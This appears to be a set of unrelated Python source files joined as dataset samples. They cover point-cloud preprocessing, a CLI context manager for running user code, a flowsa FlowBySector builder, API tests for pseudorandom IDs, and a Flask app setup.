parts_min_bounds = np.empty((num_parts, 3))
parts_max_bounds = np.empty((num_parts, 3))
for link_index, link in enumerate(rest_state_data['links']):
if link['virtual']:
continue
link_index_key = str(link_index)
part_points = points_rest_state[mask == link_index]
center = np.asarray(part_info[link_index_key]['center'])
# diagonal axis aligned bounding box length to 1
# (0.5, 0.5, 0.5) centered
npcs_translation = - center + 0.5 * part_info[link_index_key]['scale']
npcs_scale = 1.0 / part_info[link_index_key]['scale']
part_points_norm = part_points + npcs_translation
part_points_norm *= npcs_scale
npcs[mask == link_index] = part_points_norm
part_class = part_info[link_index_key]['part_class']
points_class[mask == link_index] = part_class
npcs_transformation = np.reshape(parts_camera2rest_state[link['part_index']], (4, 4), order='F')
npcs_transformation[:3, 3] += npcs_translation
npcs2cam_transformation = np.linalg.inv(npcs_transformation)
parts_npcs2cam_transformation[part_class] = npcs2cam_transformation.flatten('F')
parts_npcs2cam_scale[part_class] = 1.0 / npcs_scale
parts_min_bounds[part_class] = np.asarray(part_info[link_index_key]['min_bound'])
parts_max_bounds[part_class] = np.asarray(part_info[link_index_key]['max_bound'])
# process joints related ground truth
link_names = [link['name'] for link in rest_state_data['links']]
# transform joints to naocs space
# viewer = Viewer()
naocs_joints = rest_state_data['joints']
for i, joint in enumerate(rest_state_data['joints']):
if not joint:
continue
joint_pose = np.asarray(joint['pose2link']).reshape((4, 4), order='F')
joint_parent = joint['parent']
parent_link = rest_state_data['links'][link_names.index(joint_parent)]
parent_link_abs_pose = np.asarray(parent_link['abs_pose']).reshape((4, 4), order='F')
joint_abs_pose = np.dot(parent_link_abs_pose, joint_pose)
joint_pos = joint_abs_pose[:3, 3]
naocs_joint_pos = joint_pos + naocs_translation
naocs_joint_pos *= naocs_scale
joint_axis = np.dot(joint_abs_pose[:3, :3], joint['axis'])
joint_axis = joint_axis / np.linalg.norm(joint_axis)
naocs_joints[i]['abs_position'] = naocs_joint_pos
naocs_joints[i]['axis'] = joint_axis
joint_child = joint['child']
child_link_class = part_info[str(link_names.index(joint_child))]['part_class']
joint_class = child_link_class
naocs_joints[i]['class'] = joint_class
joint_type = JointType[joint['type']].value
naocs_joints[i]['type'] = joint_type
# if self.export:
# viewer.add_trimesh_arrows([naocs_joint_pos], [joint_axis], color=Viewer.rgba_by_index(joint_class))
# if self.export:
# tmp_data_dir = os.path.join(self.tmp_output_dir, row['objectCat'], row['objectId'],
# row['articulationId'])
# io.ensure_dir_exists(tmp_data_dir)
# viewer.export(os.path.join(tmp_data_dir, instance_name + '_naocs_arrows.ply'))
valid_joints = [joint for joint in naocs_joints if joint if joint['type'] >= 0]
num_valid_joints = len(valid_joints)
tmp_heatmap = np.empty((num_valid_joints, naocs.shape[0]))
tmp_unitvec = np.empty((num_valid_joints, naocs.shape[0], 3))
for i, joint in enumerate(valid_joints):
joint_class = joint['class']
parent_links = [i for i, link in enumerate(rest_state_data['links'])
if link if not link['virtual'] if joint['parent'] == link['name']]
child_links = [i for i, link in enumerate(rest_state_data['links'])
if link if not link['virtual'] if joint['child'] == link['name']]
connected_links = parent_links + child_links
part_classes = [part_info[str(link_index)]['part_class'] for link_index in connected_links]
if joint['type'] == JointType.prismatic.value:
part_classes = [part_class for part_class in part_classes if part_class == joint_class]
selected_vertex_indices = np.isin(points_class, part_classes)
part_heatmap, part_unitvec = ProcStage2Impl.get_joint_params(naocs, joint, selected_vertex_indices)
tmp_heatmap[joint_class - 1] = part_heatmap
tmp_unitvec[joint_class - 1] = part_unitvec
joints_association = tmp_heatmap.argmin(axis=0)
points_heatmap = tmp_heatmap[joints_association, np.arange(naocs.shape[0])]
points_unitvec = tmp_unitvec[joints_association, np.arange(naocs.shape[0])]
points_unitvec[points_heatmap >= self.heatmap_threshold] = np.zeros(3)
joints_association[points_heatmap >= self.heatmap_threshold] = -1
points_heatmap_result = 1.0 - points_heatmap / self.heatmap_threshold
points_heatmap_result[points_heatmap >= self.heatmap_threshold] = -1
# points with no joint association has value 0
joints_association += 1
joints_axis = np.zeros((naocs.shape[0], 3))
joint_types = -np.ones(num_parts)
for joint in naocs_joints:
if joint:
joints_axis[joints_association == joint['class']] = joint['axis']
joint_types[joint['class']] = joint['type']
h5frame = h5file.require_group(instance_name)
h5frame.attrs['objectCat'] = row["objectCat"]
h5frame.attrs['objectId'] = row["objectId"]
h5frame.attrs['articulationId'] = row["articulationId"]
h5frame.attrs['frameId'] = row["frameId"]
h5frame.attrs['numParts'] = num_parts
h5frame.attrs['id'] = instance_name
h5frame.create_dataset("seg_per_point", shape=points_class.shape, data=points_class, compression="gzip")
h5frame.create_dataset("camcs_per_point", shape=points_camera.shape, data=points_camera, compression="gzip")
h5frame.create_dataset("npcs_per_point", shape=npcs.shape, data=npcs, compression="gzip")
h5frame.create_dataset("naocs_per_point", shape=naocs.shape, data=naocs, compression="gzip")
h5frame.create_dataset("heatmap_per_point", shape=points_heatmap_result.shape, data=points_heatmap_result,
compression="gzip")
h5frame.create_dataset("unitvec_per_point", shape=points_unitvec.shape, data=points_unitvec,
compression="gzip")
h5frame.create_dataset("axis_per_point", shape=joints_axis.shape, data=joints_axis,
compression="gzip")
h5frame.create_dataset("joint_cls_per_point", shape=joints_association.shape, data=joints_association,
compression="gzip")
h5frame.create_dataset("joint_type", shape=joint_types.shape, data=joint_types, compression="gzip")
# 6D transformation from npcs to camcs
h5frame.create_dataset("npcs2cam_rt", shape=parts_npcs2cam_transformation.shape,
data=parts_npcs2cam_transformation, compression="gzip")
# scale from npcs to camcs
h5frame.create_dataset("npcs2cam_scale", shape=parts_npcs2cam_scale.shape, data=parts_npcs2cam_scale,
compression="gzip")
h5frame.create_dataset("naocs2cam_rt", shape=naocs2cam_transformation.shape,
data=naocs2cam_transformation, compression="gzip")
h5frame.create_dataset("naocs2cam_scale", shape=(1,), data=naocs2cam_scale,
compression="gzip")
norm_factors = 1.0 / parts_npcs2cam_scale
h5frame.create_dataset("norm_factors", shape=norm_factors.shape, data=norm_factors,
compression="gzip")
# part bounds at rest state
norm_corners = np.stack((parts_min_bounds, parts_max_bounds), axis=1)
h5frame.create_dataset("norm_corners", shape=norm_corners.shape, data=norm_corners,
compression="gzip")
bar.next()
bar.finish()
h5file.close()
input_h5.close()
return output_filepath
class ProcStage2:
def __init__(self, cfg):
self.cfg = cfg
self.input_cfg = self.cfg.paths.preprocess.stage2.input
self.input_h5_path = os.path.join(self.cfg.paths.preprocess.output_dir, self.input_cfg.pcd_data)
self.output_dir = self.cfg.paths.preprocess.output_dir
self.stag1_tmp_output = self.cfg.paths.preprocess.stage1.tmp_output
self.tmp_output = self.cfg.paths.preprocess.stage2.tmp_output
self.split_info = None
self.debug = self.cfg.debug
self.show = self.cfg.show
self.export = self.cfg.export
stage1_input = self.cfg.paths.preprocess.stage1.input
self.part_orders = io.read_json(os.path.join(self.cfg.paths.preprocess.input_dir, stage1_input.part_order_file))
self.heatmap_threshold = self.cfg.params.joint_association_threshold
def split_data(self, train_percent=.6, split_on='objectId', seed=None):
instances = []
visit_groups = lambda name, node: instances.append(name) if isinstance(node, h5py.Group) else None
input_h5 = h5py.File(self.input_h5_path, 'r')
input_h5.visititems(visit_groups)
df_dataset = pd.DataFrame([name.split('_') for name in instances],
columns=['objectCat', 'objectId', 'articulationId', 'frameId'])
df_dataset = df_dataset.drop_duplicates(ignore_index=True)
# select data in config
selected_categories = df_dataset['objectCat'].isin(self.cfg.settings.categories) \
if len(self.cfg.settings.categories) > 0 else df_dataset['objectCat'].astype(bool)
selected_object_ids = df_dataset['objectId'].isin(self.cfg.settings.object_ids) \
if len(self.cfg.settings.object_ids) > 0 else df_dataset['objectId'].astype(bool)
selected_articulation_ids = df_dataset['articulationId'].isin(self.cfg.settings.articulation_ids) \
if len(self.cfg.settings.articulation_ids) > 0 else df_dataset['articulationId'].astype(bool)
df_dataset = df_dataset[selected_categories & selected_object_ids & selected_articulation_ids]
if io.file_exist(self.cfg.paths.preprocess.stage2.input.split_info, ext='.csv'):
input_split_info = pd.read_csv(self.cfg.paths.preprocess.stage2.input.split_info, dtype=object)
split_on_columns = ['objectCat', 'objectId', 'articulationId', 'frameId']
train_set = input_split_info[input_split_info["set"] == "train"]
val_set = input_split_info[input_split_info["set"] == "val"]
test_set = input_split_info[input_split_info["set"] == "test"]
train = train_set.merge(df_dataset, how='left', on=split_on_columns)
val = val_set.merge(df_dataset, how='left', on=split_on_columns)
test = test_set.merge(df_dataset, how='left', on=split_on_columns)
self.split_info = pd.concat([train, val, test], keys=["train", "val", "test"], names=['set', 'index'])
else:
# split to train, val, test
log.info(f'Split on key {split_on}')
if len(df_dataset):
if split_on == 'objectId':
split_on_columns = ['objectCat', 'objectId']
elif split_on == 'articulationId':
split_on_columns = ['objectCat', 'objectId', 'articulationId']
elif split_on == 'frameId':
split_on_columns = ['objectCat', 'objectId', 'articulationId', 'frameId']
else:
split_on_columns = ['objectCat', 'objectId']
log.warning(f'Cannot parse split_on {split_on}, split on objectId by default')
val_end = train_percent + (1.0 - train_percent) / 2.0
split_df = df_dataset[split_on_columns].drop_duplicates()
set_size = len(split_df)
train_set, val_set, test_set = np.split(
split_df.sample(frac=1.0, random_state=seed),
[int(train_percent * set_size), int(val_end * set_size)]
)
train = train_set.merge(df_dataset, how='left', on=split_on_columns)
val = val_set.merge(df_dataset, how='left', on=split_on_columns)
test = test_set.merge(df_dataset, how='left', on=split_on_columns)
self.split_info = pd.concat([train, val, test], keys=["train", "val", "test"], names=['set', 'index'])
else:
log.error('No data to split!')
return
self.split_info.to_csv(os.path.join(self.output_dir, self.cfg.paths.preprocess.stage2.output.split_info))
def process(self):
io.ensure_dir_exists(self.output_dir)
if self.split_info is None or self.split_info.empty:
log.error('No data to process!')
return
train = self.split_info.loc['train']
log.info(f'Stage2 Process Train Set {len(train)} instances')
self.process_set(train, self.output_dir, self.cfg.paths.preprocess.stage2.output.train_data)
val = self.split_info.loc['val']
log.info(f'Stage2 Process Val Set {len(val)} instances')
self.process_set(val, self.output_dir, self.cfg.paths.preprocess.stage2.output.val_data)
test = self.split_info.loc['test']
log.info(f'Stage2 Process Test Set {len(test)} instances')
self.process_set(test, self.output_dir, self.cfg.paths.preprocess.stage2.output.test_data)
def process_set(self, input_data, output_dir, output_filename):
# process object info
object_df = input_data[['objectCat', 'objectId']].drop_duplicates()
object_infos = {}
bar = Bar('Stage2 Parse Object Infos', max=len(object_df))
for index, row in object_df.iterrows():
stage1_tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.stag1_tmp_output.folder_name,
row['objectCat'], row['objectId'])
rest_state_data_path = os.path.join(stage1_tmp_data_dir, self.stag1_tmp_output.rest_state_data)
rest_state_data = io.read_json(rest_state_data_path)
object_mesh_path = os.path.join(stage1_tmp_data_dir, self.stag1_tmp_output.rest_state_mesh)
object_dict = utils.get_mesh_info(object_mesh_path)
part_dict = {}
part_order = None
if self.part_orders:
part_order = self.part_orders[row['objectCat']][row['objectId']]
part_index = 0
for link_index, link in enumerate(rest_state_data['links']):
if link['virtual']:
continue
part_mesh_path = os.path.join(stage1_tmp_data_dir,
f'{link["name"]}_{self.stag1_tmp_output.rest_state_mesh}')
part_dict[link_index] = utils.get_mesh_info(part_mesh_path)
if part_order:
part_dict[link_index]['part_class'] = part_order.index(link['part_index'])
else:
part_dict[link_index]['part_class'] = part_index
part_index += 1
if row['objectCat'] in object_infos:
object_infos[row['objectCat']][row['objectId']] = {'object': object_dict, 'part': part_dict}
else:
object_infos[row['objectCat']] = {row['objectId']: {'object': object_dict, 'part': part_dict}}
bar.next()
bar.finish()
tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
io.ensure_dir_exists(tmp_data_dir)
object_infos_path = os.path.join(tmp_data_dir, self.tmp_output.object_info)
io.write_json(object_infos, object_infos_path)
num_processes = min(cpu_count(), self.cfg.num_workers)
# calculate the chunk size
chunk_size = max(1, int(input_data.shape[0] / num_processes))
chunks = [input_data.iloc[input_data.index[i:i + chunk_size]] for i in
range(0, input_data.shape[0], chunk_size)]
log.info(f'Stage2 Processing Start with {num_processes} workers and {len(chunks)} chunks')
config = OmegaConf.create()
config.input_h5_path = self.input_h5_path
config.stage1_tmp_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.stag1_tmp_output.folder_name)
config.tmp_output_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
config.output_path = os.path.join(config.tmp_output_dir, output_filename)
config.rest_state_data_filename = self.stag1_tmp_output.rest_state_data
config.object_infos_path = object_infos_path
config.heatmap_threshold = self.heatmap_threshold
config.export = self.cfg.export
with Pool(processes=num_processes) as pool:
proc_impl = ProcStage2Impl(config)
output_filepath_list = pool.starmap(proc_impl, enumerate(chunks))
h5_output_path = os.path.join(output_dir, output_filename)
h5file = h5py.File(h5_output_path, 'w')
for filepath in output_filepath_list:
with h5py.File(filepath, 'r') as h5f:
for key in h5f.keys():
h5f.copy(key, h5file)
h5file.close()
# if self.debug:
# tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.tmp_output.folder_name)
# io.ensure_dir_exists(tmp_data_dir)
# with h5py.File(h5_output_path, 'r') as h5file:
# visualizer = ANCSHVisualizer(h5file, NetworkType.ANCSH, gt=True, sampling=20)
# visualizer.point_size = 5
# visualizer.arrow_sampling = 10
# visualizer.prefix = ''
# visualizer.render(show=self.show, export=tmp_data_dir, export_mesh=self.export)
| 1.976563 | 2 |
cli/skyline/user_code_utils.py | danielsnider/ecosystem-project-website-template | 23 | 12765038 | <filename>cli/skyline/user_code_utils.py
import contextlib
import os
import sys
from skyline.exceptions import exceptions_as_analysis_errors
@contextlib.contextmanager
def user_code_environment(script_root_path, project_root):
"""
A combined context manager that activates all relevant context managers
used when running user code.
"""
with sys_path_root(script_root_path):
with prevent_module_caching():
with exceptions_as_analysis_errors(project_root):
yield
@contextlib.contextmanager
def sys_path_root(script_root_path):
"""
A context manager that sets sys.path[0] to the specified path on entry and
then restores it after exiting the context manager.
"""
# As per the Python documentation, sys.path[0] always stores the path to
# the directory containing the Python script that was used to start the
# Python interpreter. The contents of sys.path are used to resolve module
# imports.
#
# When we run user code (e.g., the user's entry point file), we want to run
# it as if it was being directly executed by the user from the shell. For
# example:
#
# $ python3 entry_point.py
#
# For this to work, we need to ensure that sys.path[0] is the path to the
# directory containing the entry_point.py file. However if we use exec(),
# sys.path[0] is set to the path of Skyline's command line executable.
#
# To fix this problem, we set sys.path[0] to the correct root path before
# running the user's code and restore it to Skyline's script path after the
# execution completes. Doing this is **very important** as it ensures that
# imports work as expected inside the user's code. This context manager
# should be used each time we execute user code because imports can exist
# inside user-defined functions.
#
# Setting and then restoring sys.path[0] is better than just appending the
# user's path to sys.path because we want to avoid accidentally importing
# anything from the user's codebase.
skyline_script_root = sys.path[0]
try:
sys.path[0] = script_root_path
yield
finally:
sys.path[0] = skyline_script_root
@contextlib.contextmanager
def prevent_module_caching():
"""
A context manager that prevents any imported modules from being cached
after exiting.
"""
try:
original_modules = sys.modules.copy()
yield
finally:
newly_added = {
module_name for module_name in sys.modules.keys()
if module_name not in original_modules
}
for module_name in newly_added:
del sys.modules[module_name]
| 2.609375 | 3 |
flowsa/flowbysector.py | modelearth/flowsa | 13 | 12765039 | # flowbysector.py (flowsa)
# !/usr/bin/env python3
# coding=utf-8
"""
Produces a FlowBySector data frame based on a method file for the given class
To run code, specify the "Run/Debug Configurations" Parameters to the
"flowsa/data/flowbysectormethods" yaml file name
you want to use.
Example: "Parameters: --m Water_national_2015_m1"
Files necessary to run FBS:
a. a method yaml in "flowsa/data/flowbysectormethods"
b. crosswalk(s) for the main dataset you are allocating and any datasets
used to allocate to sectors
c. a .py file in "flowsa/" for the main dataset you are allocating if
you need functions to clean up the FBA
before allocating to FBS
"""
import argparse
import yaml
import pandas as pd
from esupy.processed_data_mgmt import write_df_to_file
import flowsa
from flowsa.common import log, vLog, flowbysectormethodpath, flow_by_sector_fields, \
fips_number_key, flow_by_activity_fields, load_source_catalog, \
flowbysectoractivitysetspath, flow_by_sector_fields_w_activity, \
paths, fba_activity_fields, rename_log_file, \
fbs_activity_fields, fba_fill_na_dict, fbs_fill_na_dict, fbs_default_grouping_fields, \
fbs_grouping_fields_w_activities, logoutputpath
from flowsa.metadata import set_fb_meta, write_metadata
from flowsa.fbs_allocation import direct_allocation_method, function_allocation_method, \
dataset_allocation_method
from flowsa.sectormapping import add_sectors_to_flowbyactivity, map_fbs_flows, \
get_sector_list
from flowsa.flowbyfunctions import agg_by_geoscale, sector_aggregation, \
aggregator, subset_df_by_geoscale, sector_disaggregation, dynamically_import_fxn
from flowsa.dataclean import clean_df, harmonize_FBS_columns, reset_fbs_dq_scores
from flowsa.validation import allocate_dropped_sector_data,\
compare_activity_to_sector_flowamounts, \
compare_fba_geo_subset_and_fbs_output_totals, compare_geographic_totals,\
replace_naics_w_naics_from_another_year, calculate_flowamount_diff_between_dfs
def parse_args():
"""
Make year and source script parameters
:return: dictionary, 'method'
"""
ap = argparse.ArgumentParser()
ap.add_argument("-m", "--method",
required=True, help="Method for flow by sector file. "
"A valid method config file must exist with this name.")
args = vars(ap.parse_args())
return args
def load_method(method_name):
"""
Loads a flowbysector method from a YAML
:param method_name: str, FBS method name (ex. 'Water_national_m1_2015')
:return: dictionary, items in the FBS method yaml
"""
sfile = flowbysectormethodpath + method_name + '.yaml'
try:
with open(sfile, 'r') as f:
method = yaml.safe_load(f)
except IOError:
log.error("FlowBySector method file not found.")
return method
def load_source_dataframe(k, v):
"""
Load the source dataframe. Data can be a FlowbyActivity or
FlowBySector parquet stored in flowsa, or a FlowBySector
formatted dataframe from another package.
:param k: str, The datasource name
:param v: dictionary, The datasource parameters
:return: df of identified parquet
"""
if v['data_format'] == 'FBA':
# if yaml specifies a geoscale to load, use parameter to filter dataframe
if 'source_fba_load_scale' in v:
geo_level = v['source_fba_load_scale']
else:
geo_level = None
vLog.info("Retrieving flowbyactivity for datasource %s in year %s", k, str(v['year']))
flows_df = flowsa.getFlowByActivity(datasource=k, year=v['year'], flowclass=v['class'],
geographic_level=geo_level)
elif v['data_format'] == 'FBS':
vLog.info("Retrieving flowbysector for datasource %s", k)
flows_df = flowsa.getFlowBySector(k)
elif v['data_format'] == 'FBS_outside_flowsa':
vLog.info("Retrieving flowbysector for datasource %s", k)
flows_df = dynamically_import_fxn(k, v["FBS_datapull_fxn"])(v)
else:
vLog.error("Data format not specified in method file for datasource %s", k)
return flows_df
def main(**kwargs):
"""
Creates a flowbysector dataset
:param kwargs: dictionary of arguments, only argument is "method_name", the name of method
corresponding to flowbysector method yaml name
:return: parquet, FBS save to local folder
"""
if len(kwargs) == 0:
kwargs = parse_args()
method_name = kwargs['method']
# assign arguments
vLog.info("Initiating flowbysector creation for %s", method_name)
# call on method
method = load_method(method_name)
# create dictionary of data and allocation datasets
fb = method['source_names']
# Create empty list for storing fbs files
fbs_list = []
for k, v in fb.items():
# pull fba data for allocation
flows = load_source_dataframe(k, v)
if v['data_format'] == 'FBA':
# ensure correct datatypes and that all fields exist
flows = clean_df(flows, flow_by_activity_fields,
fba_fill_na_dict, drop_description=False)
# map flows to federal flow list or material flow list
flows_mapped, mapping_files = map_fbs_flows(flows, k, v, keep_fba_columns=True)
# clean up fba, if specified in yaml
if "clean_fba_df_fxn" in v:
vLog.info("Cleaning up %s FlowByActivity", k)
flows_mapped = dynamically_import_fxn(k, v["clean_fba_df_fxn"])(flows_mapped)
# if activity_sets are specified in a file, call them here
if 'activity_set_file' in v:
aset_names = pd.read_csv(flowbysectoractivitysetspath +
v['activity_set_file'], dtype=str)
else:
aset_names = None
# create dictionary of allocation datasets for different activities
activities = v['activity_sets']
# subset activity data and allocate to sector
for aset, attr in activities.items():
# subset by named activities
if 'activity_set_file' in v:
names = aset_names[aset_names['activity_set'] == aset]['name']
else:
names = attr['names']
vLog.info("Preparing to handle %s in %s", aset, k)
# subset fba data by activity
flows_subset =\
flows_mapped[(flows_mapped[fba_activity_fields[0]].isin(names)) |
(flows_mapped[fba_activity_fields[1]].isin(names)
)].reset_index(drop=True)
# if activities are sector-like, check sectors are valid
if load_source_catalog()[k]['sector-like_activities']:
flows_subset2 =\
replace_naics_w_naics_from_another_year(flows_subset,
method['target_sector_source'])
# check impact on df FlowAmounts
vLog.info('Calculate FlowAmount difference caused by '
'replacing NAICS Codes with %s, saving difference in Validation log',
method['target_sector_source'],)
calculate_flowamount_diff_between_dfs(flows_subset, flows_subset2)
else:
flows_subset2 = flows_subset.copy()
# extract relevant geoscale data or aggregate existing data
flows_subset_geo = subset_df_by_geoscale(flows_subset2, v['geoscale_to_use'],
attr['allocation_from_scale'])
# if loading data subnational geoscale, check for data loss
if attr['allocation_from_scale'] != 'national':
compare_geographic_totals(flows_subset_geo, flows_mapped, k,
attr, aset, names)
# Add sectors to df activity, depending on level of specified sector aggregation
log.info("Adding sectors to %s", k)
flows_subset_wsec =\
add_sectors_to_flowbyactivity(flows_subset_geo,
sectorsourcename=method['target_sector_source'],
allocationmethod=attr['allocation_method'])
# clean up fba with sectors, if specified in yaml
if "clean_fba_w_sec_df_fxn" in v:
vLog.info("Cleaning up %s FlowByActivity with sectors", k)
flows_subset_wsec = \
dynamically_import_fxn(k, v["clean_fba_w_sec_df_fxn"])(flows_subset_wsec,
attr=attr,
method=method)
# rename SourceName to MetaSources and drop columns
flows_mapped_wsec = flows_subset_wsec.\
rename(columns={'SourceName': 'MetaSources'}).\
drop(columns=['FlowName', 'Compartment'])
# if allocation method is "direct", then no need to create alloc ratios,
# else need to use allocation
# dataframe to create sector allocation ratios
if attr['allocation_method'] == 'direct':
fbs = direct_allocation_method(flows_mapped_wsec, k, names, method)
# if allocation method for an activity set requires a specific
# function due to the complicated nature
# of the allocation, call on function here
elif attr['allocation_method'] == 'allocation_function':
fbs = function_allocation_method(flows_mapped_wsec, k, names, attr, fbs_list)
else:
fbs =\
dataset_allocation_method(flows_mapped_wsec, attr,
names, method, k, v, aset,
method_name, aset_names)
# drop rows where flowamount = 0 (although this includes dropping suppressed data)
fbs = fbs[fbs['FlowAmount'] != 0].reset_index(drop=True)
# define grouping columns dependent on sectors being activity-like or not
if load_source_catalog()[k]['sector-like_activities'] is False:
groupingcols = fbs_grouping_fields_w_activities
groupingdict = flow_by_sector_fields_w_activity
else:
groupingcols = fbs_default_grouping_fields
groupingdict = flow_by_sector_fields
# clean df
fbs = clean_df(fbs, groupingdict, fbs_fill_na_dict)
# aggregate df geographically, if necessary
log.info("Aggregating flowbysector to %s level", method['target_geoscale'])
# determine from scale
if fips_number_key[v['geoscale_to_use']] <\
fips_number_key[attr['allocation_from_scale']]:
from_scale = v['geoscale_to_use']
else:
from_scale = attr['allocation_from_scale']
fbs_geo_agg = agg_by_geoscale(fbs, from_scale,
method['target_geoscale'], groupingcols)
# aggregate data to every sector level
log.info("Aggregating flowbysector to all sector levels")
fbs_sec_agg = sector_aggregation(fbs_geo_agg, groupingcols)
# add missing naics5/6 when only one naics5/6 associated with a naics4
fbs_agg = sector_disaggregation(fbs_sec_agg)
# check if any sector information is lost before reaching
# the target sector length, if so,
# allocate values equally to disaggregated sectors
vLog.info('Searching for and allocating FlowAmounts for any parent '
'NAICS that were dropped in the subset to '
'%s child NAICS', method['target_sector_level'])
fbs_agg_2 = allocate_dropped_sector_data(fbs_agg, method['target_sector_level'])
# compare flowbysector with flowbyactivity
compare_activity_to_sector_flowamounts(
flows_mapped_wsec, fbs_agg_2, aset, k, method)
# return sector level specified in method yaml
# load the crosswalk linking sector lengths
sector_list = get_sector_list(method['target_sector_level'])
# subset df, necessary because not all of the sectors are
# NAICS and can get duplicate rows
fbs_1 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isin(sector_list)) &
(fbs_agg_2[fbs_activity_fields[1]].isin(sector_list))].\
reset_index(drop=True)
fbs_2 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isin(sector_list)) &
(fbs_agg_2[fbs_activity_fields[1]].isnull())].\
reset_index(drop=True)
fbs_3 = fbs_agg_2.loc[(fbs_agg_2[fbs_activity_fields[0]].isnull()) &
(fbs_agg_2[fbs_activity_fields[1]].isin(sector_list))].\
reset_index(drop=True)
fbs_sector_subset = pd.concat([fbs_1, fbs_2, fbs_3])
# drop activity columns
fbs_sector_subset = fbs_sector_subset.drop(['ActivityProducedBy',
'ActivityConsumedBy'],
axis=1, errors='ignore')
# save comparison of FBA total to FBS total for an activity set
compare_fba_geo_subset_and_fbs_output_totals(flows_subset_geo, fbs_sector_subset,
aset, k, v, attr, method)
log.info("Completed flowbysector for %s", aset)
fbs_list.append(fbs_sector_subset)
else:
# if the loaded flow dt is already in FBS format, append directly to list of FBS
log.info("Append %s to FBS list", k)
# ensure correct field datatypes and add any missing fields
flows = clean_df(flows, flow_by_sector_fields, fbs_fill_na_dict)
fbs_list.append(flows)
# create single df of all activities
log.info("Concat data for all activities")
fbss = pd.concat(fbs_list, ignore_index=True, sort=False)
log.info("Clean final dataframe")
# add missing fields, ensure correct data type, add missing columns, reorder columns
fbss = clean_df(fbss, flow_by_sector_fields, fbs_fill_na_dict)
# prior to aggregating, replace MetaSources string with all sources
# that share context/flowable/sector values
fbss = harmonize_FBS_columns(fbss)
# aggregate df as activities might have data for the same specified sector length
fbss = aggregator(fbss, fbs_default_grouping_fields)
# sort df
log.info("Sort and store dataframe")
# ensure correct data types/order of columns
fbss = clean_df(fbss, flow_by_sector_fields, fbs_fill_na_dict)
fbss = fbss.sort_values(
['SectorProducedBy', 'SectorConsumedBy', 'Flowable', 'Context']).reset_index(drop=True)
# tmp reset data quality scores
fbss = reset_fbs_dq_scores(fbss)
# save parquet file
meta = set_fb_meta(method_name, "FlowBySector")
write_df_to_file(fbss, paths, meta)
write_metadata(method_name, method, meta, "FlowBySector")
# rename the log file saved to local directory
rename_log_file(method_name, meta)
log.info('See the Validation log for detailed assessment of model results in %s', logoutputpath)
if __name__ == '__main__':
main()
| 2.21875 | 2 |
tests/api/test_api_create_pseudorandom_ids.py | LCBRU/identity | 0 | 12765040 | <gh_stars>0
import pytest
from identity.printing.discordance import ID_TYPE_PARTICIPANT
from identity.model.id import PseudoRandomId
from tests.api import add_api_key_to_url
path = '/api/create_pseudorandom_ids'
@pytest.mark.parametrize(
"id_count",
[
(1),
(10),
],
)
def test__create_pseudorandom_ids__valid_json(client, faker, id_count):
resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
prefix=ID_TYPE_PARTICIPANT,
id_count=id_count,
))
assert resp.status_code == 201
assert resp.json is not None
assert resp.json['ids'] is not None
assert len(resp.json['ids']) == id_count
assert PseudoRandomId.query.filter(PseudoRandomId.full_code.in_(resp.json['ids'])).count() == id_count
def test__create_pseudorandom_ids__no_prefix(client, faker):
resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
id_count=1,
))
assert resp.status_code == 400
def test__create_pseudorandom_ids__no_id_count(client, faker):
resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
prefix=ID_TYPE_PARTICIPANT,
))
assert resp.status_code == 400
def test__create_pseudorandom_ids__prefix_invalid(client, faker):
resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
prefix='NONENEHIUEIUEIUG',
id_count=1,
))
assert resp.status_code == 400
@pytest.mark.parametrize(
"id_count",
[
(0),
(-1),
],
)
def test__create_pseudorandom_ids__invalid_id_count(client, faker, id_count):
resp = client.post(add_api_key_to_url(faker.get_api_key(), path), json=dict(
prefix=ID_TYPE_PARTICIPANT,
id_count=id_count,
))
assert resp.status_code == 400
| 2.21875 | 2 |
app.py | cynepton/fyyur | 0 | 12765041 | #----------------------------------------------------------------------------#
# Imports
#----------------------------------------------------------------------------#
import json
import dateutil.parser
import babel
from flask import Flask, render_template, request, Response, flash, redirect, url_for
from flask_moment import Moment
from flask_sqlalchemy import SQLAlchemy
import logging
from logging import Formatter, FileHandler
from flask_wtf import Form, FlaskForm
from forms import *
from flask_migrate import Migrate
import psycopg2
#----------------------------------------------------------------------------#
# App Config.
#----------------------------------------------------------------------------#
db = SQLAlchemy()
def create_app():
app = Flask(__name__)
# TODO: connect to a local postgresql database
app.config.from_object('config')
db.init_app(app)
return app
app = create_app()
moment = Moment(app)
migrate = Migrate(app, db)
#----------------------------------------------------------------------------#
# Models.
#----------------------------------------------------------------------------#
# Seperated into models.py
from models import Venue, Artist, Shows
#----------------------------------------------------------------------------#
# Filters.
#----------------------------------------------------------------------------#
def format_datetime(value, format='medium'):
date = dateutil.parser.parse(value)
if format == 'full':
format="EEEE MMMM, d, y 'at' h:mma"
elif format == 'medium':
format="EE MM, dd, y h:mma"
return babel.dates.format_datetime(date, format)
app.jinja_env.filters['datetime'] = format_datetime
#----------------------------------------------------------------------------#
# Controllers.
#----------------------------------------------------------------------------#
@app.route('/')
def index():
return render_template('pages/home.html')
# ----------------------------------------------------------------
# Routes
# ----------------------------------------------------------------
from routes import *
@app.errorhandler(404)
def not_found_error(error):
return render_template('errors/404.html'), 404
@app.errorhandler(500)
def server_error(error):
return render_template('errors/500.html'), 500
if not app.debug:
file_handler = FileHandler('error.log')
file_handler.setFormatter(
Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')
)
app.logger.setLevel(logging.INFO)
file_handler.setLevel(logging.INFO)
app.logger.addHandler(file_handler)
app.logger.info('errors')
#----------------------------------------------------------------------------#
# Launch.
#----------------------------------------------------------------------------#
# Default port:
# if __name__ == '__main__':
# app.run()
# Or specify port manually:
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
| 2.296875 | 2 |
